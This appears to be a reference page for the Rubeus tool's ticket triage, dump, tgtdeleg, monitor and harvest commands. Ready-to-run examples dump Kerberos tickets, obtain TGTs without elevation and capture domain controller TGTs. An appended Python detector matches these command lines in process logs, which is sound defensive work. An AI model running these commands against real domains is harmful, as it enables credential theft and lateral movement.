triage / klist / dump / tgtdeleg / monitor / harvest
Ticket extraction and harvesting commands.
triage - Quick Ticket Table
Display a summary table of tickets (LUID, user, service, expiry).
Usage
Rubeus.exe triage [/luid:<luid>] [/user:<username>] [/service:<sname>] [/server:<fqdn>]
- Non-elevated: shows current user's tickets only
- Elevated: shows all tickets on the system
Examples
Rubeus.exe triage
Rubeus.exe triage /service:ldap
Rubeus.exe triage /luid:0x474722b
Rubeus.exe triage /user:<username>
klist - Detailed Ticket Info
Show detailed logon session and ticket information.
Usage
Rubeus.exe klist [/luid:<luid>] [/user:<username>] [/service:<sname>] [/server:<fqdn>]
Examples
Rubeus.exe klist
Rubeus.exe klist /luid:0x47869b4
Rubeus.exe klist /user:<username>
dump - Extract Ticket Data (Base64 KRB-CRED)
Extract ticket data as base64 KRB-CRED blobs. Elevated: dumps all users. Non-elevated: only service tickets for current user (session keys for TGTs not returned).
Usage
Rubeus.exe dump [/luid:<luid>] [/user:<username>] [/service:<sname>] [/server:<fqdn>] [/nowrap]
Examples
# Dump all tickets (elevated)
Rubeus.exe dump
# Dump only TGTs (elevated)
Rubeus.exe dump /service:krbtgt
# Dump specific session
Rubeus.exe dump /luid:0x47869cc
# Dump tickets for specific user
Rubeus.exe dump /user:<username> /nowrap
tgtdeleg - Get Usable TGT Without Elevation
Abuse Kerberos GSS-API delegation to retrieve a usable TGT for the current user without elevation. Uses the Kekeo tgt::deleg trick.
Usage
Rubeus.exe tgtdeleg [/target:<spn>]
Options
- /target:<spn> - specify unconstrained-delegation SPN if auto-detection fails (e.g. HOST/<dc>.<domain>)
Examples
Rubeus.exe tgtdeleg
Rubeus.exe tgtdeleg /target:HOST/<dc>.<domain>
monitor - Monitor for New TGTs
Periodically poll for new TGTs and display them as they appear. Useful on hosts with unconstrained delegation.
Usage
Rubeus.exe monitor [/interval:<seconds>] [/targetuser:<target-user>] [/nowrap] [/registry:<software-key>] [/runfor:<seconds>]
Options
- /interval:<seconds> - polling interval (default: 60)
- /targetuser:<target-user> - only capture TGTs for this user
- /nowrap - don't line-wrap base64 output
- /registry:<software-key> - save output to HKLM\<key> (e.g. SOFTWARE\MONITOR)
- /runfor:<seconds> - stop after this many seconds
Examples
# Monitor for DC$ machine TGT (unconstrained delegation capture)
Rubeus.exe monitor /targetuser:DC$ /interval:10
# Run for 5 minutes
Rubeus.exe monitor /interval:30 /runfor:300
Requires elevation.
harvest - Monitor + Auto-Renew TGTs
Like monitor but also maintains a cache of valid TGTs and auto-renews them before expiry.
Usage
Rubeus.exe harvest [/monitorinterval:<seconds>] [/displayinterval:<seconds>] [/targetuser:<target-user>] [/nowrap] [/registry:<software-key>] [/runfor:<seconds>]
Options
- /monitorinterval:<seconds> - TGT check interval (default: 60)
- /displayinterval:<seconds> - cache display interval (default: 1200)
- /targetuser:<target-user> - filter for specific user
- /nowrap - don't line-wrap
- /registry:<software-key> - save to registry
- /runfor:<seconds> - stop after N seconds
Examples
Rubeus.exe harvest /monitorinterval:30 /displayinterval:300
Rubeus.exe harvest /monitorinterval:30 /targetuser:<target-user>
Requires elevation.
Notes
- triage < klist < dump in terms of detail (and cost)
- dump without elevation returns service tickets only; TGT session keys are zeroed
- Use tgtdeleg to get a usable TGT without elevation (works because session key is recoverable from cache via GSS-API delegation trick)
- monitor/harvest are ideal for unconstrained delegation hosts waiting for privileged users to connect
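From the defender's side, the verb-plus-flag syntax documented above is distinctive enough to match in process-creation command lines even when the binary has been renamed. The following is an added example, not part of the original page or of Rubeus: the function name classify, the result fields and the sample command lines are assumptions constructed for illustration.

```python
import re
import shlex

# Flags per verb, copied from the usage lines on this page.
_FILTERS = {"luid", "user", "service", "server"}
VERB_FLAGS = {
    "triage": _FILTERS,
    "klist": _FILTERS,
    "dump": _FILTERS | {"nowrap"},
    "tgtdeleg": {"target"},
    "monitor": {"interval", "targetuser", "nowrap", "registry", "runfor"},
    "harvest": {"monitorinterval", "displayinterval", "targetuser", "nowrap", "registry", "runfor"},
}
NEEDS_ELEVATION = {"monitor", "harvest"}  # marked "Requires elevation." on this page
FLAG_RE = re.compile(r"^/([A-Za-z]+)(?::(.*))?$")

def classify(cmdline):
    """Return a finding when the arguments match one verb's syntax, else None.
    The image name is ignored, so a renamed binary still matches."""
    try:
        tokens = shlex.split(cmdline, posix=False)  # keeps backslashes intact
    except ValueError:  # unbalanced quote in the logged command line
        tokens = cmdline.split()
    if len(tokens) < 2 or tokens[1].lower() not in VERB_FLAGS:
        return None
    verb, flags = tokens[1].lower(), {}
    for arg in tokens[2:]:
        m = FLAG_RE.match(arg)
        if not m or m.group(1).lower() not in VERB_FLAGS[verb]:
            return None  # foreign argument: another tool's "dump", "monitor", ...
        flags[m.group(1).lower()] = m.group(2) or ""
    key = flags.get("registry")
    return {
        "verb": verb,
        # A bare verb is weak evidence; a verb plus its own flags is strong.
        "confidence": "high" if flags else "low",
        "needs_elevation": verb in NEEDS_ELEVATION,
        # /registry saves output under HKLM\<key>: a host artifact to collect.
        "registry_artifact": "HKLM\\" + key if key else None,
    }

# Constructed process-creation command lines (not real telemetry).
SAMPLES = [
    r"C:\Users\Public\svc.exe monitor /targetuser:DC$ /interval:10 /registry:SOFTWARE\MONITOR",
    r"Rubeus.exe dump /service:krbtgt /nowrap",
    r"C:\Windows\System32\klist.exe tickets",
    r"backup.exe dump /var/db",
]
```

Feed it the command-line field of process-creation events; the built-in klist.exe and unrelated tools that happen to take a "dump" argument fall through as None.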